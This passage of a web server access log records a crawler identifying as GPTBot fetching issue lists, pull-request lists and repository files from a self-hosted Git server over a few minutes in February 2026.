+0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 9985] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=nearduedate&state=closed&type=all" -[17/Feb/2026:18:57:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=farduedate&state=closed&type=all" -[17/Feb/2026:18:57:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 9986] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=nearduedate&state=closed&type=all" -[17/Feb/2026:18:57:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10015] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=leastupdate&state=closed&type=all" -[17/Feb/2026:18:57:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=leastcomment&state=closed&type=all" -[17/Feb/2026:18:57:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10020] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=leastupdate&state=closed&type=all" -[17/Feb/2026:18:57:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10150] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=recentupdate&state=open&type=all" -[17/Feb/2026:18:57:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10153] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=recentupdate&state=open&type=all" -[17/Feb/2026:18:57:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10155] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=leastcomment&state=open&type=all" -[17/Feb/2026:18:57:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10206] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=recentupdate&state=closed&type=all" -[17/Feb/2026:18:57:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10201] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=farduedate&state=closed&type=all" -[17/Feb/2026:18:57:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/warn-AssetPilot.txt?display=rendered" [Client 74.7.227.38] [Length 11174] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/warn-AssetPilot.txt" -[17/Feb/2026:18:57:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt?display=source" [Client 74.7.227.38] [Length 14507] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt" -[17/Feb/2026:18:57:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/QUICKSTART_WINDOWS.md?display=rendered" [Client 74.7.227.38] [Length 13352] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/QUICKSTART_WINDOWS.md" -[17/Feb/2026:18:57:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/uninstall_service.bat?display=rendered" [Client 74.7.227.38] [Length 11265] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/uninstall_service.bat" -[17/Feb/2026:18:57:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10001] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&state=all&type=all" -[17/Feb/2026:18:57:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/AssetPilot.pkg?display=rendered" [Client 74.7.227.38] [Length 11093] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/AssetPilot.pkg" -[17/Feb/2026:18:57:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10030] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&state=open&type=all" -[17/Feb/2026:18:57:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9979] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&state=all&type=all" -[17/Feb/2026:18:57:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10198] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&project=-1&state=open&type=all" -[17/Feb/2026:18:58:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10040] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=oldest&state=closed&type=all" -[17/Feb/2026:18:58:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2fPatrol%20Window%20Service%20%eb%93%b1%eb%a1%9d%2fREADME_WINDOWS.md" [Client 74.7.227.38] [Length 36168] [Gzip 9.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/README_WINDOWS.md" -[17/Feb/2026:18:58:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10014] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&sort=latest&state=all&type=all" -[17/Feb/2026:18:58:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10180] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&sort=latest&state=all&type=all" -[17/Feb/2026:18:58:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10034] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&state=open&type=all" -[17/Feb/2026:18:58:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10202] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&project=-1&state=open&type=all" -[17/Feb/2026:18:58:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9981] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&project=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:18:58:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json?display=source" [Client 74.7.227.38] [Length 12795] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:18:58:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json?display=source" [Client 74.7.227.38] [Length 35759] [Gzip 10.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:18:58:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json?display=rendered" [Client 74.7.227.38] [Length 11152] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:18:58:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json?display=rendered" [Client 74.7.227.38] [Length 11151] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:18:58:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10191] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=leastcomment&state=closed&type=all" -[17/Feb/2026:18:58:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old_log_macros.hpp?display=source" [Client 74.7.227.38] [Length 12079] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old_log_macros.hpp" -[17/Feb/2026:18:58:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:18:58:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10034] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:18:58:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10204] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:58:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10196] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:18:58:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:18:58:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10034] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:18:58:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10202] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:18:58:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10199] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:18:58:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10042] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:18:58:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10033] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:18:58:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10199] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:18:58:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10204] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:58:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10031] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&state=all&type=all" -[17/Feb/2026:18:58:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&state=all&type=all" -[17/Feb/2026:18:58:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/project.assets.json?display=rendered" [Client 74.7.227.38] [Length 11175] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/project.assets.json" -[17/Feb/2026:18:58:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10011] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&state=all&type=all" -[17/Feb/2026:18:58:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10005] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&state=all&type=all" -[17/Feb/2026:18:58:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10177] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&project=-1&state=all&type=all" -[17/Feb/2026:18:58:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10008] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&state=all&type=all" -[17/Feb/2026:18:58:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10174] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&project=-1&state=all&type=all" -[17/Feb/2026:18:58:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10006] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&state=all&type=all" -[17/Feb/2026:18:58:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10183] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&project=-1&state=all&type=all" -[17/Feb/2026:18:58:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10005] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&sort=mostcomment&state=all&type=all" -[17/Feb/2026:18:58:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr 